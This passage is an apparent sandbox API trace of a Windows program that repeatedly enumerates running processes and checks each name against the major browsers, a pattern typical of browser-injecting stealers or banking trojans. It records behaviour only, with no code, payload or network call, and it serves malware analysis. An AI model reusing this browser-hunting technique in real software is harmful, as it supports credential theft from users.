th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0202.179] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0202.179] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0202.179] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0202.179] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0202.179] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.179] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0202.179] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0202.179] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0202.179] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0202.179] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0202.179] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.179] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0202.180] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0202.180] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0202.180] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0202.180] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0202.180] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.180] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0202.180] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0202.180] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0202.180] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0202.180] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0202.180] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.180] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0202.181] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0202.181] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0202.181] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0202.181] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0202.181] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.181] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0202.182] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0202.182] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0202.182] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0202.182] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0202.182] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0202.182] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0202.182] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0202.182] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0202.182] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0202.182] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="opera.exe") returned 1 [0202.182] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.182] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0202.183] CloseHandle (hObject=0xe8) returned 1 [0202.183] Sleep (dwMilliseconds=0x3e8) [0203.304] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0203.306] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.307] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0203.307] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0203.307] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0203.307] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0203.307] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0203.307] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0203.307] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0203.307] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0203.307] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0203.307] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0203.307] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0203.307] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0203.308] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0203.308] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0203.308] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0203.308] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0203.308] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.308] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0203.308] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0203.308] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0203.308] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0203.308] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0203.308] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.309] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0203.309] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0203.309] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0203.309] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0203.309] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0203.309] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.309] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0203.310] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0203.310] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0203.310] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0203.310] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0203.310] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.310] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0203.310] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0203.310] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0203.310] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0203.310] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0203.310] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.310] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0203.311] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0203.311] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0203.311] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0203.311] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0203.311] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.311] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0203.311] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0203.311] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0203.311] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0203.311] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0203.312] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.312] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0203.312] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0203.312] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0203.312] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0203.312] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0203.312] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.312] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.313] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0203.313] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0203.313] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0203.313] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0203.313] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.313] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.313] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0203.313] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0203.313] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0203.313] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0203.313] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.313] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.314] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0203.314] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0203.314] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0203.314] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0203.314] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.314] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.314] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0203.314] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0203.314] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0203.315] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0203.315] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.315] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.315] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0203.315] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0203.315] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0203.315] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0203.315] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.315] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0203.316] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0203.316] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0203.316] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0203.316] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0203.316] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.316] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.316] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0203.316] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0203.316] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0203.316] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0203.316] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.316] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.317] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0203.317] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0203.317] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0203.317] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0203.317] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.317] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0203.318] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0203.318] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0203.318] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0203.318] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0203.318] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.318] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0203.318] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0203.318] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0203.318] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0203.318] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0203.318] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.318] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0203.319] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0203.319] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0203.319] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0203.319] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0203.319] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.319] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.319] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0203.319] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0203.319] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0203.319] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0203.320] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.320] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0203.320] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0203.320] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0203.320] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0203.320] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0203.320] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.320] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0203.321] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0203.321] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0203.321] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0203.321] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0203.321] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.321] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0203.321] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0203.321] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0203.321] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0203.321] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0203.321] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.321] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0203.322] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0203.322] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0203.322] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0203.322] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0203.322] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.322] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0203.322] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0203.323] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0203.323] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0203.323] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0203.323] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.323] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0203.323] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0203.323] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0203.323] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0203.323] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0203.323] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.323] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0203.324] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0203.324] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0203.324] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0203.324] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0203.324] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.324] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, 